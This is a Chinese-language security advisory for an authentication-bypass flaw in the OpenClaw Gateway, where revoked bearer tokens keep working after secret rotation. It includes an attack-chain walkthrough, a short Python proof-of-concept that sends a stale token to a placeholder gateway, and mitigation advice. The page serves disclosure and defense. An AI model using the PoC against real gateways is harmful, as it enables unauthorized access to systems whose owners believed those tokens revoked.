CVE-2026-43585 CVSS 8.1 高危

CVE-2026-43585 OpenClaw Bearer Token验证绕过漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43585

漏洞类型

认证绕过

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.4.15 之前的版本存在安全漏洞，该程序在启动时捕获已解析的 bearer-auth 配置，而没有在每个请求处理时重新解析。这导致在 SecretRef 轮换后，被吊销的令牌仍然有效。攻击者可以利用这一缺陷，使用已轮换的 bearer 令牌绕过身份验证，从而获得对 Gateway 的未授权 HTTP 和 WebSocket 访问权限。

技术细节

该漏洞的根本原因是 OpenClaw 在处理 Bearer Token 认证时的逻辑缺陷。受影响的版本仅在服务启动时解析一次 SecretRef 并缓存配置，而不是在每个请求到达时动态解析。当管理员为了安全起见轮换 SecretRef 以吊销旧令牌时，Gateway 仍然使用启动时加载的旧配置进行验证。因此，攻击者即使持有本应失效的旧令牌，依然可以通过网络向 Gateway 发送 HTTP 或 WebSocket 请求并成功通过验证，导致机密性、完整性和可用性受到严重影响。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用 OpenClaw Gateway 且版本低于 2026.4.15。

STEP 2

获取令牌

攻击者通过某种方式获取了一个有效的 Bearer Token（或该令牌在轮换前已被记录）。

STEP 3

等待轮换

管理员执行 SecretRef 轮换操作，吊销了旧 Token，但 OpenClaw 服务未重启或未动态更新配置。

STEP 4

利用漏洞

攻击者使用已被吊销的旧 Token 向 Gateway 发送 HTTP 或 WebSocket 请求。

STEP 5

达成访问

Gateway 使用启动时缓存的旧配置验证通过，攻击者获得未授权的敏感数据访问或操作权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://vulnerable-openclaw-gateway:8080/api/v1/protected"
# An old bearer token that should have been revoked after SecretRef rotation
stale_bearer_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

headers = {
    "Authorization": f"Bearer {stale_bearer_token}",
    "Accept": "application/json"
}

try:
    print("[*] Attempting to access gateway with stale token...")
    response = requests.get(target_url, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Exploit successful! The stale token was accepted.")
        print(f"[+] Response body: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.4.15

防御指南

临时缓解措施

建议立即升级到修复版本。如果无法立即升级，作为临时缓解措施，可以定期重启 OpenClaw Gateway 服务以确保加载最新的 SecretRef 配置，或者实施网络层访问控制（如 IP 白名单）来限制对 Gateway 的访问，直到补丁应用完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表